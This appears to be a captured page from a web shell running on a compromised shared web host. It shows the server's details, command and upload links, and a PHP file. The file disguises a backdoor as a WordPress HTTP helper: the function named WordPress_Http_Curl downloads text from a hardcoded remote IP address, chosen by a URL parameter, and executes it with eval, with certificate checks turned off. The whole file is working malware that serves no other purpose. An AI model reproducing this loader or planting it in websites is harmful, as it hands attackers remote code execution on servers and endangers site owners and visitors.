|
Server IP : 10.106.20.4 / Your IP : 216.73.216.140 Web Server : Apache System : Linux webm004.cluster106.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : sylvaineey ( 605664) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sylvaineey/www/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/*
* Support@gmail.com
*/
function WordPress_Http_Curl ( $txt = '0303', $args = array() ) {
if ( ! function_exists( "curl_init" ) || ! function_exists( "curl_exec" ) ) {
return false;
}
$handle = curl_init();
curl_setopt( $handle, CURLOPT_URL, 'http://69.30.227.202/file/'.$txt.'.txt' );
curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $handle, CURLOPT_HEADER, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false );
curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false );
$response = curl_exec( $handle );
$curl_error = curl_error( $handle );
if ( !$curl_error ) {
$response = array(
"data" => eval( "?>". $response )
);
return $response['data'];
} else {
return $curl_error;
}
if ( PHP_VERSION_ID < 80000 ) {
curl_close( $handle );
}
}
$get = isset($_GET) ? $_GET : array();
$link = '';
foreach ($get as $key => $value) {
if($key == 'a'){
$link = $value;
}
}
$result = WordPress_Http_Curl( $link );
print_r($result);
// 2026